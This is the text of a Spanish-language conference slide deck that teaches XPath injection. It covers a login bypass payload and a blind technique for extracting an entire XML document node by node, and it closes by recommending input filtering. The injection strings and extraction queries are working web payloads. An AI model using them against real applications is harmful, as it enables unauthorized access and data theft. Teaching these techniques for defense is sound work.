BlindXPathInjectionPedro Laguna

Agenda¿Qué es XPath?Consultas XPathXPathInjectionBlindXPathInjectionSacar el numero de nodos y atributosSacar la longitud de nodos y atrib…Sacar el nombre de ya sabeis que :PSacar el contenidoY ahora… ¡Todo junto!

XPathExisten dos versiones: 1.0 y 2.0La 1.0 es una recomendación de la W3C del 16 de noviembre de 1999Permite realizar busquedas en ficheros XMLNos podemos referir a cualquier contenido del fichero de una manera rapidaDevuelve arrays con la informacionextraida

Conceptos en XPath<charlas> <!– Esto es un XML muy simple… --><charla id=“2”> <titulo>BlindXPathInjection</titulo> <ponente>Pedro Laguna</ponente> <?processinghref=“charla.css” style=“text/css” ?></charla></charlas>COMENTARIONODOATRIBUTOCONTENIDOPROCESSING-INSTRUCTION

Elementos en XPath4 tipos de elementosNodo: Puede contener al resto de tiposText: Contiene textoComment: Un comentario de XMLProcessing-instruction: Instrucción para ejecutar comandos XSLT en el fichero XML

Preguntando…¿Cuál es la charla?/charlas/charla/titulo¿Cuál es el id de la charla?/charlas/charla/@id¿La charla de la que es ponente Pedro?/charlas/charla[ponente = “Pedro Laguna”]

Operadoresandor<><=>==!=Los operadores and y or no pueden ir en mayúsculas.

Los operadores and y or no pueden ir en mayúsculas.

XPathInjectionSimilar al SQL Injection de los logins:/usuarios/usuario[login = “$user” and password = “$pass”]Si no filtramos las variables nos pueden generar una consulta cierta para todos los casos:/usuarios/usuario[login = “a” or “a”=“a” or “a”=“b” and password = “asdf”

XPathInjection¿Por qué funciona? login = “a” or “a”=“a” or “a”=“b” and password = “asdf”ORCIERTOFALSO¡Estamos dentro!

DEMOXPathInjection en campos de login

BlindXPathInjectionNos permite extraer todo el arbol XMLVamos a seguir el siguiente procedimiento:Extraer el numero de nodos y atributosSacar la longitud de los nodos y los atributosExtraer el nombre de los nodos y atributosExtraer el contenido de los nodos y los atributos

Consultas “avanzadas” en XPathSeleccionar la raiz del arbol XML/Seleccionar todos los elementos:Nodos: //child::node()Texto: //child::*Comentarios: //child::comment()Processing-instructions: //child:processing-instruction()Seleccionar todos los atributos://attribute::* o //@*Seleccionar el primer subnodo de un nodo:/nodo/subnodo[1]

Funciones disponibles en XPathtext()Selecciona el texto contenido dentro de los nodosname()Selecciona el nombre de los nodos y atributosposition()Devuelve el indice del elementocount(consulta)Cuenta el numero de elementos devueltos por la consultastarts-with(string, string)Devuelve true si la primera cadena empieza por la segundacontains(string, string)Devuelve true si la primera cadena contiene la segundastring-length(string)Devuelve la longitud de la cadena

Numero total de nodos y atributoscount(//child::*)Cuenta el numero total de nodos y subnodoscount(//@*)Cuenta el numero total de atributosp.e.2” and count(//child::*) > 0 or “a”=“b2” and count(/users/user/@*) > 0 or “a”=“b

Longitud de nodos y atributos/nodo/subnodo/child::*[position()=X and string-length(name()) > 0]Devuelve la longitud del nodoqueeste en la posicion X/nodo/subnodo/@*[position()=X and string-length(name()) > 0]Devuelve la longitud del atributoqueeste en la posicion X

Reduccion de charset/nodo/subnodo[X]/child::*[position()=Y and contains(name(), 'abc')]Devuelveciertosi el subnodoXtiene en la posicionY un nodoquecontiene la cadenaabc/nodo/subnodo[X]/@*[position()=Y and contains(name(), 'abc')]Devuelveciertosi el subnodoXtiene en la posicionY un nodoquecontiene la cadenaabc

Búsqueda binariaSabiendo la longitud y el charset de un elemento se podría reducir el numero de consultas a realizar

Nombre de nodos y atributos/nodo/subnodo[1]/child::*[position() = 1 and starts-with(name(), ‘abc')Devuelveciertosi el primer nodoempieza con abc/nodo/subnodo[1]/@*[position() = 1 and starts-with(name(), ‘abc')]Devuelve cierto si el primer atributo del subnodo empieza con abc

Información contenida en nodos y atributosLongitud de nodos y atributosstring-length(/nodo/subnodo[X]/campo) > 0Devuelve la longitud del contenido del nodo campo dentro del subnodo en la posicionXstring-length(/nodo/subnodo[X]/@atrib) > 0Devuelve la longitud del contenido del atributo atribdentro del subnodo en la posicionX

Información contenida en nodos y atributosTexto de nodos y atributosstarts-with(/nodo/subnodo[X]/campo,’abc’)Devuelve cierto si el campo del subnodoX empieza por la cadena abcstarts-with(/nodo/subnodo[X]/@atrib,’abc’)Devuelve cierto si el atributo del subnodoX empieza por la cadena abcEvidentemente también se puede hacer reducción de charset y búsqueda binaria…

Y ahora… ¡Todo junto!Demostración de BXI

Universal XPathInjectionNos permite extraer todo el contenido de los nodos sin conocer nada acerca del arbolNo se puede hacer lo mismo con atributos, comentarios o processinginstructions.Se basa en las consultas:Longitud: string-length(//child::*) > 0Reduccioncharset: contains(//child::*)Extraccion: starts-with(//child::*, ‘abc’)

DEMOAxolote

ConclusionesMediante XPath podemos acceder a todo el contenido del ficheroEn campos de login hacer uso de BlindXPathInjection es abusar un poco :PDe nuevo, filtrar los parámetros se convierte en condición indispensableUXI vale para casos en los que la mayor parte de la información esta contenida en los nodos

http://www.equilibrioinestable.com/

¿Preguntas?Pedro Lagunaplaguna@informatica64.comhttp://www.equilibrioinestable.com/